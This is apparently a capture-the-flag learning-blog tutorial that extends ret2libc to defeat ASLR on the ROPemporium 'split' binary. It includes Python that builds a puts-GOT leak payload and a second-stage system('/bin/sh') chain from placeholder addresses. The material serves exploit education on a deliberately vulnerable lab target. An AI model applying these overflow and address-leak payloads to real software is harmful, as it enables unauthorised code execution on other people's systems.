
Reiterate the Concept of Ret2libc + defeating ASLR ◉_◉ (day 49)


In the previous post about ret2libc, we found out that attackers can bypass the NX protection by combining their payload with functions that already exist in the libc library to gain control of the program.

But we were only able to pop a shell because ASLR was off. Can we still do it if it's on?

Sure you can!

So in this post, I will show you how to extend ret2libc into an ASLR bypass.

Note: the following binary is not compiled as PIE, which means the addresses of its own code and data (main, the PLT stubs, the GOT) stay the same every time the program is loaded; only the libc mapping moves.
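You can verify that claim on your own copy of a binary without any tooling: the ELF header's e_type field is ET_EXEC for a fixed-address executable and ET_DYN for a PIE. The following is an added example, not code from the original post or from ROPemporium; it parses the header with the standard library and reads the kernel's ASLR knob, which is the same information a tool such as pwntools' checksec reports. The ELF headers built by make_elf_header are constructed for testing and are not real binaries.

```python
import struct

# e_type values from the ELF specification
ET_EXEC, ET_DYN = 2, 3

def elf_type(data):
    """Return 'EXEC' (fixed load address, not PIE) or 'DYN' (PIE / shared object)
    from the first 18 bytes of an ELF file."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_data = data[5]                       # 1 = little endian, 2 = big endian
    endian = "<" if ei_data == 1 else ">"
    e_type = struct.unpack(endian + "H", data[16:18])[0]   # e_type sits right after e_ident
    return {ET_EXEC: "EXEC", ET_DYN: "DYN"}.get(e_type, f"other({e_type})")

def is_pie(data):
    """True when the binary's own addresses (PLT, GOT, main) are randomized by ASLR."""
    return elf_type(data) == "DYN"

def aslr_setting(path="/proc/sys/kernel/randomize_va_space"):
    """Read the Linux ASLR knob: 0 = off, 1 = stack/mmap/libs, 2 = also brk.
    Returns None when the file is unavailable (non-Linux host)."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None

def make_elf_header(e_type, bits=32):
    """Construct a minimal ELF header for testing (constructed bytes, not a real binary)."""
    # e_ident: magic, class (1 = 32-bit, 2 = 64-bit), data (1 = LE), version, then padding to 16 bytes
    ident = b"\x7fELF" + bytes([1 if bits == 32 else 2, 1, 1]) + b"\x00" * 9
    # e_type, e_machine (EM_386 = 3, EM_X86_64 = 62), e_version
    return ident + struct.pack("<HHI", e_type, 3 if bits == 32 else 62, 1)

if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        hdr = f.read(18)
    print(f"{sys.argv[1]}: {elf_type(hdr)}, PIE={is_pie(hdr)}, ASLR={aslr_setting()}")
```

Run it as `python3 elfcheck.py ./split`: a non-PIE binary reports EXEC even with ASLR at 2, which is exactly the combination this post relies on. A PIE binary reports DYN, and in that case the PLT and GOT addresses used below would move between runs as well.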


For the demonstration, I will use the 32-bit binary split from ROPemporium (https://ropemporium.com/).


From the figure above we can see that the binary is pretty simple: it asks you for input and doesn't show anything else yet. A classic BOF!


When we list all the functions we can see a function named "pwnme"; this is a good clue for where to start our exploit.


When we disassemble the function we can see that fgets is called with a size larger than the buffer, and we can prove it by feeding a large input to the program.



From crashing the program we can see that it takes 44 bytes of padding to overwrite EIP.

In a typical ret2libc exploit, from here you would find the addresses of system, exit and "/bin/sh", put them together and get a shell. But remember that ASLR is on, which means the location of these functions will change every time we run the program.


So how do we make our exploit adapt to ASLR? We can use the ret2puts approach. The concept is mostly the same as ret2libc, but instead of calling system right away to pop a shell, we first call the puts function to leak a libc address.

If you take a look at the main function there are plenty of puts calls we can use, and notice that they all end up calling the same address, which in this case is 0x8048420.


When we analyze that address we can see it is a stub that jumps through the GOT table, which holds the actual runtime address of the function.


Note: you need to be able to distinguish the PLT from the GOT in ELF. The GOT holds the resolved addresses of the imported functions, whereas the PLT is just a stub that jumps through its GOT entry.

From here we can craft our payload to look like this:

payload = puts@function + main@function + puts@GOT

  • puts@function is the address of the puts PLT stub that we will call
  • main@function is the return address, so after puts finishes its task execution goes back to main again
  • puts@GOT is the parameter for puts

When we run this payload, puts will print the runtime address of puts in libc, and we subtract from this value the offset of puts inside libc. The result of this calculation gives you the libc base address in the OS.


Cool! So we got the address of the "puts" function in libc at runtime; now all we have to do is subtract from this value the offset of "puts" inside libc, like this.

To get the offset of "puts" you can do it like in the picture below.


Cool, now we can get the rest of the payload (system, exit, "/bin/sh").
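The whole two-stage procedure above (craft the leak payload, read the 4 bytes puts prints, subtract the puts offset to get the libc base, then rebase system, exit and "/bin/sh") is just address arithmetic, so here it is as an added example written for this post; it is not the script from the original post. The 44-byte padding and the puts PLT address 0x8048420 come from the post; MAIN_ADDR, PUTS_GOT and the entries in LIBC_OFFSETS are constructed placeholder numbers, not values from the real binary or from any real glibc (read the real ones from your own binary and libc with readelf or nm). The page-alignment check is the practical sanity check: libc is always mapped on a page boundary, so a base that is not a multiple of 0x1000 means you parsed the leak wrong or used offsets from a different libc build.

```python
import struct

PADDING = 44                   # bytes needed to reach EIP (from the post)
PUTS_PLT = 0x08048420          # puts PLT stub address (from the post)
MAIN_ADDR = 0x080485ab         # placeholder: main in the non-PIE binary (constructed)
PUTS_GOT = 0x0804a018          # placeholder: GOT slot of puts (constructed)

# Placeholder symbol offsets inside libc (constructed for this example; read the
# real ones with `readelf -s libc.so.6` or `strings -tx libc.so.6 | grep /bin/sh`).
LIBC_OFFSETS = {"puts": 0x5f140, "system": 0x3a940, "exit": 0x2e7b0, "/bin/sh": 0x15902b}

def build_leak_payload(padding=PADDING, puts_plt=PUTS_PLT, main_addr=MAIN_ADDR, puts_got=PUTS_GOT):
    """Stage 1 (32-bit cdecl): ret into puts@plt, 'return' into main, with puts@got as the argument."""
    return b"A" * padding + struct.pack("<III", puts_plt, main_addr, puts_got)

def parse_leak(output):
    """The first 4 bytes puts writes are the little-endian runtime address stored in puts@got."""
    if len(output) < 4:
        raise ValueError("leak too short: expected at least 4 bytes")
    return struct.unpack("<I", output[:4])[0]

def libc_base_from_leak(leaked_puts, offsets=LIBC_OFFSETS):
    """libc base = runtime address of puts - offset of puts inside libc."""
    base = leaked_puts - offsets["puts"]
    if base & 0xfff:
        # libc is mmap'd page-aligned; a misaligned base means a bad parse or the wrong libc offsets
        raise ValueError(f"libc base {base:#x} is not page-aligned; wrong libc offsets?")
    return base

def resolve(base, offsets=LIBC_OFFSETS):
    """Rebase every symbol we need onto the leaked libc base."""
    return {name: base + off for name, off in offsets.items()}

def build_shell_payload(addrs, padding=PADDING):
    """Stage 2: the classic ret2libc chain, system(\"/bin/sh\") returning into exit."""
    return b"A" * padding + struct.pack("<III", addrs["system"], addrs["exit"], addrs["/bin/sh"])

if __name__ == "__main__":
    # Constructed output as puts would print it: the 4-byte address followed by a newline.
    fake_output = struct.pack("<I", 0xf7dee140) + b"\n"
    leaked = parse_leak(fake_output)
    base = libc_base_from_leak(leaked)
    addrs = resolve(base)
    print(f"leaked puts = {leaked:#x}, libc base = {base:#x}")
    for name, addr in addrs.items():
        print(f"  {name:8s} -> {addr:#x}")
    print("stage 1:", build_leak_payload().hex())
    print("stage 2:", build_shell_payload(addrs).hex())
```

Because the binary returns to main between the two stages, the second payload is sent to a fresh read in the same process, so the libc base computed from the first leak is still valid; if the target restarted between stages, ASLR would pick a new base and the arithmetic would have to be redone.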


Combining all of the information we have, we should update our script like this:



Run the script and we get a shell :) Cool! We were able to bypass NX and ASLR at the same time :D


